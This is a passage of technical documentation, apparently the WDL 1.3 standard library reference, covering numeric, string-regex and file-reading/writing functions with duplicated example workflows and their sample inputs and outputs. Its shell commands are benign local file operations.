Array[Boolean] all_true = [floor(f1) == i1, floor(f2) == i2]
}
}
Example input:
{
"test_floor.i1": 2
}
Example output:
{
"test_floor.all_true": [true, true]
}
ceil
Int ceil(Float)
Rounds a floating point number up to the next higher integer.
Parameters:
Float: the number to round.
Returns: An integer.
Example: test_ceil.wdl
version 1.3
workflow test_ceil {
input {
Int i1
}
Int i2 = i1 + 1
Float f1 = i1
Float f2 = i1 + 0.1
output {
Array[Boolean] all_true = [ceil(f1) == i1, ceil(f2) == i2]
}
}
version 1.3
workflow test_ceil {
input {
Int i1
}
Int i2 = i1 + 1
Float f1 = i1
Float f2 = i1 + 0.1
output {
Array[Boolean] all_true = [ceil(f1) == i1, ceil(f2) == i2]
}
}
Example input:
{
"test_ceil.i1": 2
}
Example output:
{
"test_ceil.all_true": [true, true]
}
round
Int round(Float)
Rounds a floating point number to the nearest integer based on standard rounding rules ("round half up").
Parameters:
Float: the number to round.
Returns: An integer.
Example: test_round.wdl
version 1.3
workflow test_round {
input {
Int i1
}
Int i2 = i1 + 1
Float f1 = i1 + 0.49
Float f2 = i1 + 0.50
output {
Array[Boolean] all_true = [round(f1) == i1, round(f2) == i2]
}
}
version 1.3
workflow test_round {
input {
Int i1
}
Int i2 = i1 + 1
Float f1 = i1 + 0.49
Float f2 = i1 + 0.50
output {
Array[Boolean] all_true = [round(f1) == i1, round(f2) == i2]
}
}
Example input:
{
"test_round.i1": 2
}
Example output:
{
"test_round.all_true": [true, true]
}
min
This function has four choices:
* Int min(Int, Int)
* Float min(Int, Float)
* Float min(Float, Int)
* Float min(Float, Float)
Returns the smaller of two values. If both values are Ints, the return value is an Int, otherwise it is a Float.
Parameters:
Int|Float: the first number to compare.Int|Float: the second number to compare.
Returns: The smaller of the two arguments.
Example: test_min.wdl
version 1.3
workflow test_min {
input {
Int value1
Float value2
}
output {
# these two expressions are equivalent
Float min1 = if value1 < value2 then value1 else value2
Float min2 = min(value1, value2)
}
}
version 1.3
workflow test_min {
input {
Int value1
Float value2
}
output {
# these two expressions are equivalent
Float min1 = if value1 < value2 then value1 else value2
Float min2 = min(value1, value2)
}
}
Example input:
{
"test_min.value1": 1,
"test_min.value2": 2.0
}
Example output:
{
"test_min.min1": 1.0,
"test_min.min2": 1.0
}
max
This function has four choices:
* Int max(Int, Int)
* Float max(Int, Float)
* Float max(Float, Int)
* Float max(Float, Float)
Returns the larger of two values. If both values are Ints, the return value is an Int, otherwise it is a Float.
Parameters:
Int|Float: the first number to compare.Int|Float: the second number to compare.
Returns: The larger of the two arguments.
Example: test_max.wdl
version 1.3
workflow test_max {
input {
Int value1
Float value2
}
output {
# these two expressions are equivalent
Float max1 = if value1 > value2 then value1 else value2
Float max2 = max(value1, value2)
}
}
version 1.3
workflow test_max {
input {
Int value1
Float value2
}
output {
# these two expressions are equivalent
Float max1 = if value1 > value2 then value1 else value2
Float max2 = max(value1, value2)
}
}
Example input:
{
"test_max.value1": 1,
"test_max.value2": 2.0
}
Example output:
{
"test_max.max1": 2.0,
"test_max.max2": 2.0
}
String Functions
These functions operate on String arguments.
Restrictions: None
find
as of version 1.2
Given two String parameters input and pattern, searches for the occurrence of pattern within input and returns the first match or None if there are no matches. pattern is a regular expression and is evaluated as a POSIX Extended Regular Expression (ERE).
Note that regular expressions are written using regular WDL strings, so backslash characters need to be double-escaped. For example:
String? first_match = find("hello\tBob", "\\t")
Parameters
String: the input string to search.String: the pattern to search for.
Returns: The contents of the first match, or None if pattern does not match input.
Example: test_find_task.wdl
version 1.3
workflow find_string {
input {
String in = "hello world"
String pattern1 = "e..o"
String pattern2 = "goodbye"
}
output {
String? match1 = find(in, pattern1) # "ello"
String? match2 = find(in, pattern2) # None
}
}
version 1.3
workflow find_string {
input {
String in = "hello world"
String pattern1 = "e..o"
String pattern2 = "goodbye"
}
output {
String? match1 = find(in, pattern1) # "ello"
String? match2 = find(in, pattern2) # None
}
}
Example input:
{}
Example output:
{
"find_string.match1": "ello",
"find_string.match2": null
}
matches
as of version 1.2
Given two String parameters input and pattern, tests whether pattern matches input at least once. pattern is a regular expression and is evaluated as a POSIX Extended Regular Expression (ERE).
To test whether pattern matches the entire input, make sure to begin and end the pattern with anchors. For example:
Boolean full_match = matches("abc123", "^a.+3$")
Note that regular expressions are written using regular WDL strings, so backslash characters need to be double-escaped. For example:
Boolean has_tab = matches("hello\tBob", "\\t")
Parameters
String: the input string to search.String: the pattern to search for.
Returns: true if pattern matches input at least once, otherwise false.
Example: test_matches_task.wdl
version 1.3
workflow contains_string {
input {
File json
}
output {
Boolean is_compressed = matches(basename(json), "\\.(gz|zip|zstd)")
Boolean is_read1 = matches(basename(json), "_R1")
}
}
version 1.3
workflow contains_string {
input {
File json
}
output {
Boolean is_compressed = matches(basename(json), "\\.(gz|zip|zstd)")
Boolean is_read1 = matches(basename(json), "_R1")
}
}
Example input:
{
"contains_string.json": "data/person.json"
}
Example output:
{
"contains_string.is_compressed": false,
"contains_string.is_read1": false
}
sub
String sub(String, String, String)
Given three String parameters input, pattern, replace, this function replaces all non-overlapping occurrences of pattern in input by replace. pattern is a regular expression and is evaluated as a POSIX Extended Regular Expression (ERE).
Regular expressions are written using regular WDL strings, so backslash characters need to be double-escaped (e.g., "\\t").
The replacement string replace supports the special sequence \n (where n is a digit 1-9) is replaced by the text matched by the nth capturing group from the pattern, or an empty string if the capturing group did not participate in the match. Only \1 through \9 are supported as capturing group references, matching the limit of POSIX ERE. Named capture groups are not currently supported.
As with patterns, backslashes in the replace string must be double-escaped. For example, to reference the first capturing group in a WDL workflow, write "\\1" (which becomes \1 when evaluated).
๐ The option for execution engines to allow other regular expression grammars besides POSIX ERE is deprecated.
Parameters*:
String: the input string.String: the pattern to search for.String: the replacement string.
Returns: the input string, with all occurrences of the pattern replaced by the replacement string.
Example: test_sub.wdl
version 1.3
workflow test_sub {
String chocolike = "I like chocolate when\nit's late"
String question = "when chocolate"
output {
String chocolove = sub(chocolike, "like", "love") # I love chocolate when\nit's late
String chocoearly = sub(chocolike, "late", "early") # I like chocoearly when\nit's early
String chocolate = sub(chocolike, "late$", "early") # I like chocolate when\nit's early
String chocoearlylate = sub(chocolike, "[^ ]late", "early") # I like chocearly when\nit's late
String choco4 = sub(chocolike, " [[:alpha:]]{4} ", " 4444 ") # I 4444 chocolate when\nit's late
String no_newline = sub(chocolike, "\\n", " ") # "I like chocolate when it's late"
String new_question = sub(question, "([^ ]+) ([^ ]+)", "\\2, \\1?") # "chocolate, when?"
}
}
version 1.3
workflow test_sub {
String chocolike = "I like chocolate when\nit's late"
String question = "when chocolate"
output {
String chocolove = sub(chocolike, "like", "love") # I love chocolate when\nit's late
String chocoearly = sub(chocolike, "late", "early") # I like chocoearly when\nit's early
String chocolate = sub(chocolike, "late$", "early") # I like chocolate when\nit's early
String chocoearlylate = sub(chocolike, "[^ ]late", "early") # I like chocearly when\nit's late
String choco4 = sub(chocolike, " [[:alpha:]]{4} ", " 4444 ") # I 4444 chocolate when\nit's late
String no_newline = sub(chocolike, "\\n", " ") # "I like chocolate when it's late"
String new_question = sub(question, "([^ ]+) ([^ ]+)", "\\2, \\1?") # "chocolate, when?"
}
}
Example input:
{}
Example output:
{
"test_sub.chocolove": "I love chocolate when\nit's late",
"test_sub.chocoearly": "I like chocoearly when\nit's early",
"test_sub.chocolate": "I like chocolate when\nit's early",
"test_sub.chocoearlylate": "I like chocearly when\nit's late",
"test_sub.choco4": "I 4444 chocolate when\nit's late",
"test_sub.no_newline": "I like chocolate when it's late",
"test_sub.new_question": "chocolate, when?"
}
Any arguments are allowed so long as they can be coerced to Strings. For example, this can be useful to swap the extension of a filename:
Example: change_extension_task.wdl
version 1.3
task change_extension {
input {
String prefix
}
command <<<
printf "data" > ~{prefix}.data
printf "index" > ~{prefix}.index
>>>
output {
File data_file = "~{prefix}.data"
String data = read_string(data_file)
String index = read_string(sub("~{data_file}", "\\.data$", ".index"))
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task change_extension {
input {
String prefix
}
command <<<
printf "data" > ~{prefix}.data
printf "index" > ~{prefix}.index
>>>
output {
File data_file = "~{prefix}.data"
String data = read_string(data_file)
String index = read_string(sub("~{data_file}", "\\.data$", ".index"))
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{
"change_extension.prefix": "foo"
}
Example output:
{
"change_extension.data": "data",
"change_extension.index": "index"
}
Test config:
{
"exclude_outputs": ["change_extension.data_file"]
}
File Functions
These functions have a File or Directory as an input and/or output. Due to type coercion, File or Directory arguments may be specified as String values.
For functions that read from or write to the file system, if the entire contents of the cannot be read/written for any reason, the calling task or workflow fails with an error. Examples of failure include, but are not limited to, not having appropriate permissions, resource limitations (e.g., memory) when reading the file, and implementation-imposed file size limits.
For functions that write to the file system, the implementation should generate a random file name in a temporary directory so as not to conflict with any other task output files.
Restrictions
- A function that only manipulates a path (i.e., doesn't require reading any of the file's attributes or contents) may be called anywhere, whether or not the file exists.
- A function that reads a file or its attributes may only be called in a context where the input file exists. If the file is an input to a task or workflow, then it may be read anywhere in that task or worklow. If the file is created by a task, then it may only be read after it is created. For example, if the file is written during the execution of the
command, then it may only be read in the task'soutputsection. This includes functions likestdoutandstderrthat read a task's output stream. - A function that writes a file may be called anywhere. However, writing a file in a workflow is discouraged since it may have the side-effect of creating a permanent output file that is not named in the output section. For example, calling
write_linesin a workflow and then passing the resultingFileas input to a task may require the engine to persist that file to cloud storage.
basename
String basename(File, [String])
String basename(Directory, [String])
Returns the "basename" of a file or directory - the name after the last directory separator in the path.
The optional second parameter specifies a literal suffix to remove from the file name. If the file name does not end with the specified suffix then it is ignored.
Parameters
File|Directory: Path of the file or directory to read. If the argument is aString, it is assumed to be a local file path relative to the current working directory of the task.String: (Optional) Suffix to remove from the file name.
Returns: The file's basename as a String.
Example: test_basename.wdl
version 1.3
workflow test_basename {
output {
Boolean is_true1 = basename("/path/to/file.txt") == "file.txt"
Boolean is_true2 = basename("/path/to/file.txt", ".txt") == "file"
Boolean is_true3 = basename("/path/to/dir") == "dir"
}
}
version 1.3
workflow test_basename {
output {
Boolean is_true1 = basename("/path/to/file.txt") == "file.txt"
Boolean is_true2 = basename("/path/to/file.txt", ".txt") == "file"
Boolean is_true3 = basename("/path/to/dir") == "dir"
}
}
Example input:
{}
Example output:
{
"test_basename.is_true1": true,
"test_basename.is_true2": true,
"test_basename.is_true3": true
}
join_paths
as of version 1.2
String join_paths(Directory, String)
String join_paths(Directory, Array[String]+)
String join_paths(Array[String]+)
Joins together two or more paths into an absolute path in the execution environment's filesystem.
There are three choices of this function:
String join_paths(Directory, String): Joins together exactly two paths. The second path is relative to the first directory and may specify a file or directory.String join_paths(Directory, Array[String]+): Joins together any number of relative paths with a base directory. The paths in the array argument must all be relative. The last element may specify a file or directory; all other elements must specify a directory.String join_paths(Array[String]+): Joins together any number of paths. The array must not be empty. The first element of the array may be either absolute or relative; subsequent path(s) must be relative. The last element may specify a file or directory; all other elements must specify a directory.
An absolute path starts with / and indicates that the path is relative to the root of the environment in which the task is executed. Only the first path may be absolute. If any subsequent paths are absolute, it is an error.
A relative path does not start with / and indicates the path is relative to its parent directory. It is up to the execution engine to determine which directory to use as the parent when resolving relative paths; by default it is the working directory in which the task is executed.
Parameters
Directory|Array[String]+: Either a directory path or an array of paths.String|Array[String]+: A relative path or paths; only allowed if the first argument is aDirectory.
Returns: A String representing an absolute path that results from joining all the paths in order (left-to-right), and resolving the resulting path against the default parent directory if it is relative.
Example: join_paths_task.wdl
version 1.3
task join_paths {
input {
Directory abs_dir = "/usr"
String abs_str = "/usr"
String rel_dir_str = "bin"
String rel_file = "echo"
}
# these are all equivalent to '/usr/bin/echo'
String bin1 = join_paths(abs_dir, [rel_dir_str, rel_file])
String bin2 = join_paths(abs_str, [rel_dir_str, rel_file])
String bin3 = join_paths([abs_str, rel_dir_str, rel_file])
command <<<
~{bin1} -n "hello" > output.txt
>>>
output {
Boolean bins_equal = (bin1 == bin2) && (bin1 == bin3)
String result = read_string("output.txt")
}
runtime {
container: "ubuntu:latest"
}
}
version 1.3
task join_paths {
input {
Directory abs_dir = "/usr"
String abs_str = "/usr"
String rel_dir_str = "bin"
String rel_file = "echo"
}
# these are all equivalent to '/usr/bin/echo'
String bin1 = join_paths(abs_dir, [rel_dir_str, rel_file])
String bin2 = join_paths(abs_str, [rel_dir_str, rel_file])
String bin3 = join_paths([abs_str, rel_dir_str, rel_file])
command <<<
~{bin1} -n "hello" > output.txt
>>>
output {
Boolean bins_equal = (bin1 == bin2) && (bin1 == bin3)
String result = read_string("output.txt")
}
runtime {
container: "ubuntu:latest"
}
}
Example input:
{}
Example output:
{
"join_paths.bins_equal": true,
"join_paths.result": "hello"
}
glob
Array[File] glob(String)
Returns the Bash expansion of the glob string relative to the task's execution directory, and in the same order.
glob finds all of the files (but not the directories) in the same order as would be matched by running echo <glob> in Bash from the task's execution directory.
Symlinks are handled by following them to their target. Symlinks that point to files are included in the results, while symlinks that point to directories are excluded. Broken symlinks (those that point to non-existent targets) are included.
At least in standard Bash, glob expressions are not evaluated recursively, i.e., files in nested directories are not included.
Parameters:
String: The glob string.
Returns: A array of all files matched by the glob.
Example: gen_files_task.wdl
version 1.3
task gen_files {
input {
Int num_files
}
command <<<
for i in {1..~{num_files}}; do
printf ${i} > a_file_${i}.txt
done
mkdir a_dir
touch a_dir/a_inner.txt
>>>
output {
Array[File] files = glob("a_*")
Int glob_len = length(files)
}
}
version 1.3
task gen_files {
input {
Int num_files
}
command <<<
for i in {1..~{num_files}}; do
printf ${i} > a_file_${i}.txt
done
mkdir a_dir
touch a_dir/a_inner.txt
>>>
output {
Array[File] files = glob("a_*")
Int glob_len = length(files)
}
}
Example input:
{
"gen_files.num_files": 2
}
Example output:
{
"gen_files.glob_len": 2
}
Test config:
{
"exclude_outputs": ["gen_files.files"]
}
This command generates the following directory structure:
<workdir>
โโโ a_dir
โ โโ a_inner.txt
โโโ a_file_1.txt
โโโ a_file_2.txt
Running echo a_* in the execution directory would expand to a_dir, a_file_1.txt, and a_file_2.txt, in that order. Since glob ignores directories, a_dir is discarded and the result of the expression is ["a_file_1.txt", "a_file_2.txt"].
Non-standard Bash
The runtime container may use a non-standard Bash shell that supports more complex glob strings, such as allowing expansions that include a_inner.txt in the example above. To ensure that a WDL task is portable when using glob, a container image should be provided and the WDL author should remember that glob results depend on coordination with the Bash implementation provided in that container.
size
Float size(File|File?, [String])
Float size(Directory|Directory?, [String])
Float size(X|X?, [String])
Determines the size of a file, directory, or the sum total sizes of the files/directories contained within a compound value. The files may be optional values; None values have a size of 0.0. By default, the size is returned in bytes unless the optional second argument is specified with a unit
In the second choice of the size function, the parameter type X represents any compound type that contains File or File? nested at any depth.
If the size cannot be represented in the specified unit because the resulting value is too large to fit in a Float, an error is raised. It is recommended to use a unit that will always be large enough to handle any expected inputs without numerical overflow.
Parameters
File|File?|Directory|Directory?|X|X?: A file, directory, or a compound value containing files/directories, for which to determine the size.String: (Optional) The unit of storage; defaults to 'B'.
Returns: The size of the files/directories as a Float.
Example: file_sizes_task.wdl
version 1.3
task file_sizes {
command <<<
printf "this file is 22 bytes\n" > out.txt
>>>
File? missing_file = None
output {
File created_file = "out.txt"
Float missing_file_bytes = size(missing_file, "B")
Float created_file_bytes = size(created_file, "B")
Float multi_file_kb = size([created_file, missing_file], "K") # 0.022
Map[String, Pair[Int, File?]] nested = {
"a": (10, created_file),
"b": (50, missing_file)
}
Float nested_bytes = size(nested)
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task file_sizes {
command <<<
printf "this file is 22 bytes\n" > out.txt
>>>
File? missing_file = None
output {
File created_file = "out.txt"
Float missing_file_bytes = size(missing_file, "B")
Float created_file_bytes = size(created_file, "B")
Float multi_file_kb = size([created_file, missing_file], "K") # 0.022
Map[String, Pair[Int, File?]] nested = {
"a": (10, created_file),
"b": (50, missing_file)
}
Float nested_bytes = size(nested)
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{}
Example output:
{
"file_sizes.created_file": "out.txt",
"file_sizes.missing_file_bytes": 0.0,
"file_sizes.created_file_bytes": 22.0,
"file_sizes.multi_file_kb": 0.022,
"file_size.nested": {
"a": (10, "out.txt"),
"b": (50, null)
}
"file_sizes.nested_bytes": 22.0
}
stdout
File stdout()
Returns the value of the executed command's standard output (stdout) as a File. The engine should give the file a random name and write it in a temporary directory, so as not to conflict with any other task output files.
Parameters: None
Returns: A File whose contents are the stdout generated by the command of the task where the function is called.
Example: echo_stdout_task.wdl
version 1.3
task echo_stdout {
command <<< printf "hello world" >>>
output {
String message = read_string(stdout())
}
}
version 1.3
task echo_stdout {
command <<< printf "hello world" >>>
output {
String message = read_string(stdout())
}
}
Example input:
{}
Example output:
{
"echo_stdout.message": "hello world"
}
stderr
File stderr()
Returns the value of the executed command's standard error (stderr) as a File. The file should be given a random name and written in a temporary directory, so as not to conflict with any other task output files.
Parameters: None
Returns: A File whose contents are the stderr generated by the command of the task where the function is called.
Example: echo_stderr_task.wdl
version 1.3
task echo_stderr {
command <<< >&2 printf "hello world" >>>
output {
String message = read_string(stderr())
}
}
version 1.3
task echo_stderr {
command <<< >&2 printf "hello world" >>>
output {
String message = read_string(stderr())
}
}
Example input:
{}
Example output:
{
"echo_stderr.message": "hello world"
}
read_string
String read_string(File)
Reads an entire file as a String, with any trailing end-of-line characters (\r and \n) stripped off. If the file is empty, an empty string is returned.
If the file contains any internal newline characters, they are left in tact.
Parameters
File: Path of the file to read.
Returns: A String.
Example: read_string_task.wdl
version 1.3
task read_string {
# this file will contain "this\nfile\nhas\nfive\nlines\n"
File f = write_lines(["this", "file", "has", "five", "lines"])
command <<<
cat ~{f}
>>>
output {
# s will contain "this\nfile\nhas\nfive\nlines"
String s = read_string(stdout())
}
}
version 1.3
task read_string {
# this file will contain "this\nfile\nhas\nfive\nlines\n"
File f = write_lines(["this", "file", "has", "five", "lines"])
command <<<
cat ~{f}
>>>
output {
# s will contain "this\nfile\nhas\nfive\nlines"
String s = read_string(stdout())
}
}
Example input:
{}
Example output:
{
"read_string.s": "this\nfile\nhas\nfive\nlines"
}
read_int
Int read_int(File)
Reads a file that contains a single line containing only an integer and (optional) whitespace. If the line contains a valid integer, that value is returned as an Int. If the file is empty or does not contain a single integer, an error is raised.
Parameters
File: Path of the file to read.
Returns: An Int.
Example: read_int_task.wdl
version 1.3
task read_int {
command <<<
printf " 1 \n" > int_file
>>>
output {
Int i = read_int("int_file")
}
}
version 1.3
task read_int {
command <<<
printf " 1 \n" > int_file
>>>
output {
Int i = read_int("int_file")
}
}
Example input:
{}
Example output:
{
"read_int.i": 1
}
read_float
Float read_float(File)
Reads a file that contains only a numeric value and (optional) whitespace. If the line contains a valid floating point number, that value is returned as a Float. If the file is empty or does not contain a single float, an error is raised.
Parameters
File: Path of the file to read.
Returns: A Float.
Example: read_float_task.wdl
version 1.3
task read_float {
command <<<
printf " 1 \n" > int_file
printf " 2.0 \n" > float_file
>>>
output {
Float f1 = read_float("int_file")
Float f2 = read_float("float_file")
}
}
version 1.3
task read_float {
command <<<
printf " 1 \n" > int_file
printf " 2.0 \n" > float_file
>>>
output {
Float f1 = read_float("int_file")
Float f2 = read_float("float_file")
}
}
Example input:
{}
Example output:
{
"read_float.f1": 1.0,
"read_float.f2": 2.0
}
read_boolean
Boolean read_boolean(File)
Reads a file that contains a single line containing only a boolean value and (optional) whitespace. If the non-whitespace content of the line is "true" or "false", that value is returned as a Boolean. If the file is empty or does not contain a single boolean, an error is raised. The comparison is case- and whitespace-insensitive.
Parameters
File: Path of the file to read.
Returns: A Boolean.
Example: read_bool_task.wdl
version 1.3
task read_bool {
command <<<
printf " true \n" > true_file
printf " FALSE \n" > false_file
>>>
output {
Boolean b1 = read_boolean("true_file")
Boolean b2 = read_boolean("false_file")
}
}
version 1.3
task read_bool {
command <<<
printf " true \n" > true_file
printf " FALSE \n" > false_file
>>>
output {
Boolean b1 = read_boolean("true_file")
Boolean b2 = read_boolean("false_file")
}
}
Example input:
{}
Example output:
{
"read_bool.b1": true,
"read_bool.b2": false
}
read_lines
Array[String] read_lines(File)
Reads each line of a file as a String, and returns all lines in the file as an Array[String]. Trailing end-of-line characters (\r and \n) are removed from each line.
The order of the lines in the returned Array[String] is the order in which the lines appear in the file.
If the file is empty, an empty array is returned.
Parameters
File: Path of the file to read.
Returns: An Array[String] representation of the lines in the file.
Example: grep_task.wdl
version 1.3
task grep {
input {
String pattern
File file
}
command <<<
grep '~{pattern}' ~{file}
>>>
output {
Array[String] matches = read_lines(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task grep {
input {
String pattern
File file
}
command <<<
grep '~{pattern}' ~{file}
>>>
output {
Array[String] matches = read_lines(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{
"grep.pattern": "world",
"grep.file": "data/greetings.txt"
}
Example output:
{
"grep.matches": [
"hello world",
"hi_world"
]
}
write_lines
File write_lines(Array[String])
Writes a file with one line for each element in a Array[String]. All lines are terminated by the newline (\n) character (following the POSIX standard). If the Array is empty, an empty file is written.
Parameters
Array[String]: Array of strings to write.
Returns: A File.
Example: write_lines_task.wdl
version 1.3
task write_lines {
input {
Array[String] array = ["first", "second", "third"]
}
command <<<
paste -s -d'\t' ~{write_lines(array)}
>>>
output {
String s = read_string(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task write_lines {
input {
Array[String] array = ["first", "second", "third"]
}
command <<<
paste -s -d'\t' ~{write_lines(array)}
>>>
output {
String s = read_string(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{}
Example output:
{
"write_lines.s": "first\tsecond\tthird"
}
The actual command line might look like:
paste -s -d'\t' /local/fs/tmp/array.txt
And /local/fs/tmp/array.txt would contain:
first\nsecond\nthird
read_tsv
Array[Array[String]] read_tsv(File)
Array[Object] read_tsv(File, true)
Array[Object] read_tsv(File, Boolean, Array[String])
Reads a tab-separated value (TSV) file as an Array[Array[String]] representing a table of values. Trailing end-of-line characters (\r and \n) are removed from each line.
This function has three choices:
Array[Array[String]] read_tsv(File, [false]): Returns each row of the table as anArray[String]. There is no requirement that the rows of the table are all the same length.Array[Object] read_tsv(File, true): The second parameter must betrueand specifies that the TSV file contains a header line. Each row is returned as anObjectwith its keys determined by the header (the first line in the file) and its values asStrings. All rows in the file must be the same length and the field names in the header row must be validObjectfield names, or an error is raised.Array[Object] read_tsv(File, Boolean, Array[String]): The second parameter specifies whether the TSV file contains a header line, and the third parameter is an array of field names that is used to specify the field names to use for the returnedObjects. If the second parameter istrue, the specified field names override those in the file's header (i.e., the header line is ignored).
If the file is empty, an empty array is returned.
If the entire contents of the file can not be read for any reason, the calling task or workflow fails with an error. Examples of failure include, but are not limited to, not having access to the file, resource limitations (e.g. memory) when reading the file, and implementation-imposed file size limits.
Parameters
File: The TSV file to read.Boolean: (Optional) Whether to treat the file's first line as a header.Array[String]: (Optional) An array of field names. If specified, then the second parameter is also required.
Returns: An Array of rows in the TSV file, where each row is an Array[String] of fields or an Object with keys determined by the second and third parameters and String values.
Example: read_tsv_task.wdl
version 1.3
task read_tsv {
command <<<
{
printf "row1\tvalue1\n"
printf "row2\tvalue2\n"
printf "row3\tvalue3\n"
} >> data.no_headers.tsv
{
printf "header1\theader2\n"
printf "row1\tvalue1\n"
printf "row2\tvalue2\n"
printf "row3\tvalue3\n"
} >> data.headers.tsv
>>>
output {
Array[Array[String]] output_table = read_tsv("data.no_headers.tsv")
Array[Object] output_objs1 = read_tsv("data.no_headers.tsv", false, ["name", "value"])
Array[Object] output_objs2 = read_tsv("data.headers.tsv", true)
Array[Object] output_objs3 = read_tsv("data.headers.tsv", true, ["name", "value"])
}
}
version 1.3
task read_tsv {
command <<<
{
printf "row1\tvalue1\n"
printf "row2\tvalue2\n"
printf "row3\tvalue3\n"
} >> data.no_headers.tsv
{
printf "header1\theader2\n"
printf "row1\tvalue1\n"
printf "row2\tvalue2\n"
printf "row3\tvalue3\n"
} >> data.headers.tsv
>>>
output {
Array[Array[String]] output_table = read_tsv("data.no_headers.tsv")
Array[Object] output_objs1 = read_tsv("data.no_headers.tsv", false, ["name", "value"])
Array[Object] output_objs2 = read_tsv("data.headers.tsv", true)
Array[Object] output_objs3 = read_tsv("data.headers.tsv", true, ["name", "value"])
}
}
Example input:
{}
Example output:
{
"read_tsv.output_table": [
["row1", "value1"],
["row2", "value2"],
["row3", "value3"]
],
"read_tsv.output_objs1": [
{
"name": "row1",
"value": "value1"
},
{
"name": "row2",
"value": "value2"
},
{
"name": "row3",
"value": "value3"
}
],
"read_tsv.output_objs2": [
{
"header1": "row1",
"header2": "value1"
},
{
"header1": "row2",
"header2": "value2"
},
{
"header1": "row3",
"header2": "value3"
}
],
"read_tsv.output_objs3": [
{
"name": "row1",
"value": "value1"
},
{
"name": "row2",
"value": "value2"
},
{
"name": "row3",
"value": "value3"
}
]
}
write_tsv
File write_tsv(Array[Array[String]]|Array[Struct])
File write_tsv(Array[Array[String]], true, Array[String])
File write_tsv(Array[Struct], Boolean, Array[String])
Given an Array of elements, writes a tab-separated value (TSV) file with one line for each element.
There are three choices of this function:
-
File write_tsv(Array[Array[String]]): Each element is concatenated using a tab ('\t') delimiter and written as a row in the file. There is no header row. -
File write_tsv(Array[Array[String]], true, Array[String]): The second argument must betrueand the third argument provides anArrayof column names. The column names are concatenated to create a header that is written as the first row of the file. All elements must be the same length as the header array. -
File write_tsv(Array[Struct], [Boolean, [Array[String]]]): Each element is a struct whose field values are concatenated in the order the fields are defined. The optional second argument specifies whether to write a header row. If it istrue, then the header is created from the struct field names. If the second argument istrue, then the optional third argument may be used to specify column names to use instead of the struct field names.
Each line is terminated by the newline (\n) character.
The generated file should be given a random name and written in a temporary directory, so as not to conflict with any other task output files.
If the entire contents of the file can not be written for any reason, the calling task or workflow fails with an error. Examples of failure include, but are not limited to, insufficient disk space to write the file.
Parameters
Array[Array[String]] | Array[Struct]: An array of rows, where each row is either anArrayof column values or a struct whose values are the column values.Boolean: (Optional) Whether to write a header row.Array[String]: An array of column names. If the first argument isArray[Array[String]]and the second argument istruethen it is required, otherwise it is optional. Ignored if the second argument isfalse.
Returns: A File.
Example: write_tsv_task.wdl
version 1.3
struct Numbers {
String first
String second
String third
}
task write_tsv {
input {
Array[Array[String]] array = [["one", "two", "three"], ["un", "deux", "trois"]]
Array[Numbers] structs = [
Numbers {
first: "one",
second: "two",
third: "three"
},
Numbers {
first: "un",
second: "deux",
third: "trois"
}
]
}
command <<<
cut -f 1 ~{write_tsv(array)} >> array_no_header.txt
cut -f 1 ~{write_tsv(array, true, ["first", "second", "third"])} > array_header.txt
cut -f 1 ~{write_tsv(structs)} >> structs_default.txt
cut -f 2 ~{write_tsv(structs, false)} >> structs_no_header.txt
cut -f 2 ~{write_tsv(structs, true)} >> structs_header.txt
cut -f 3 ~{write_tsv(structs, true, ["no1", "no2", "no3"])} >> structs_user_header.txt
>>>
output {
Array[String] array_no_header = read_lines("array_no_header.txt")
Array[String] array_header = read_lines("array_header.txt")
Array[String] structs_default = read_lines("structs_default.txt")
Array[String] structs_no_header = read_lines("structs_no_header.txt")
Array[String] structs_header = read_lines("structs_header.txt")
Array[String] structs_user_header = read_lines("structs_user_header.txt")
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
struct Numbers {
String first
String second
String third
}
task write_tsv {
input {
Array[Array[String]] array = [["one", "two", "three"], ["un", "deux", "trois"]]
Array[Numbers] structs = [
Numbers {
first: "one",
second: "two",
third: "three"
},
Numbers {
first: "un",
second: "deux",
third: "trois"
}
]
}
command <<<
cut -f 1 ~{write_tsv(array)} >> array_no_header.txt
cut -f 1 ~{write_tsv(array, true, ["first", "second", "third"])} > array_header.txt
cut -f 1 ~{write_tsv(structs)} >> structs_default.txt
cut -f 2 ~{write_tsv(structs, false)} >> structs_no_header.txt
cut -f 2 ~{write_tsv(structs, true)} >> structs_header.txt
cut -f 3 ~{write_tsv(structs, true, ["no1", "no2", "no3"])} >> structs_user_header.txt
>>>
output {
Array[String] array_no_header = read_lines("array_no_header.txt")
Array[String] array_header = read_lines("array_header.txt")
Array[String] structs_default = read_lines("structs_default.txt")
Array[String] structs_no_header = read_lines("structs_no_header.txt")
Array[String] structs_header = read_lines("structs_header.txt")
Array[String] structs_user_header = read_lines("structs_user_header.txt")
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{}
Example output:
{
"write_tsv.array_no_header": ["one", "un"],
"write_tsv.array_header": ["first", "one", "un"],
"write_tsv.structs_default": ["one", "un"],
"write_tsv.structs_no_header": ["two", "deux"],
"write_tsv.structs_header": ["second", "two", "deux"],
"write_tsv.structs_user_header": ["no3", "three", "trois"]
}
The actual command line might look like:
cut -f 1 /local/fs/tmp/array.tsv
And /local/fs/tmp/array.tsv would contain:
one\ttwo\tthree
un\tdeux\ttrois
read_map
Map[String, String] read_map(File)
Reads a tab-separated value (TSV) file representing a set of pairs. Each row must have exactly two columns, e.g., col1\tcol2. Trailing end-of-line characters (\r and \n) are removed from each line.
Each pair is added to a Map[String, String] in order. The values in the first column must be unique; if there are any duplicate keys, an error is raised.
If the file is empty, an empty map is returned.
Parameters
File: Path of the two-column TSV file to read.
Returns: A Map[String, String], with one element for each row in the TSV file.
Example: read_map_task.wdl
version 1.3
task read_map {
command <<<
printf "key1\tvalue1\n"
printf "key2\tvalue2\n"
>>>
output {
Map[String, String] mapping = read_map(stdout())
}
}
version 1.3
task read_map {
command <<<
printf "key1\tvalue1\n"
printf "key2\tvalue2\n"
>>>
output {
Map[String, String] mapping = read_map(stdout())
}
}
Example input:
{}
Example output:
{
"read_map.mapping": {
"key1": "value1",
"key2": "value2"
}
}
write_map
File write_map(Map[String, String])
